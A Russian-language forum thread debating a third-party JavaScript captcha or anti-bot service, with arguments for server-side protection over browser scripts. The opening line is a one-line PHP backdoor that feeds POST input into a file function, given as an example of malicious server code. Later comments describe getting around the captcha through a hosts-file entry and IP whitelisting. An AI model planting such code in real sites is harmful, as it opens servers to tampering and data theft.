<?php file_get_contents($_POST["a"],$_POST["b"]); ?>
Даже не заметите как начнет удалять страницы и это в лучшем случаи, в худшем будет по тихой влиять на контент годами.
Сторонние JS скрипты более безопасны так как у них нет доступа к изменениям файлов на сервере.
Сторонние JS всегда можно отключить. А вот внедренный вредоносный код через PHP найти очень сложно.
Тут есть проблемка. Зашел с одного браузера, прошел "капчу". Зашел через другой браузер, капчу не просит, т.е. ip попал в white list.
Есть нюанс. С одного ip могут сидеть и люди, и боты.
На один мобильный ip приходится иногда больше 1000 пользователей.
А вот бот легко тыкнет в этот OK. Скорее всего. Верстку я теперь посмотрю, когда у меня сменится ip. :)
Да могут но не в режиме пакетного совмещения это дикая редкость. Обычно у ботов свой рабочий ip который практически сразу залетает в бан.
А 90% самого тупого и массового фрода как раз и идет без JS. Простые парсеры, сканеры, DDoS-боты - они все работают на уровне HTTP-запросов и твой скрипт даже не увидят
Вместо JS скрипта нужно делать серверный API. Сайт отправляет на твой сервер данные о посетителе (IP, User-Agent), а твой сервер в ответ говорит бот или не бот. Это гораздо надежнее
ближайшие проблемы с которыми ты столкнешься:
твой домен добавят в блокировщики рекламы браузеров.
твой домен попадет в базы антивирусов.
твой домен попадет в "hosts" накрутчиков и нагульщиков.
все это у меня давно пройденный этап )))
защита должна работать на уровне самого сайта (или прокси, как клаудфлар), а не на уровне браузера. только так можно сначала показывать проверку, а потом уже контент.
в hosts:
127.0.0.1 captcha.1rj.ru
я ее хакнул )))
защита должна быть на самом сервере, js защит нет и быть не может. потому на всяких тильдах воют, что нет и не может быть защит, потому что на сервер не поставить никаких своих скриптов.
Вы от части правы. Данный скрипт собирает статистику с разных сайтов только от посетителей у которых включена JS поддержка. Если JS отключить то скрипт работать не будет. На уровне сервера не впускайте на сайт посетителей у которых отключена JS технология вот вам и решение.
А если скрипт заблокирует живого пользователя, которого посчитал (по поведенческим действиям) схожим на бота? Он также не сможет зайти на сайты 2,3,4?
Кейсы успешных применений есть?
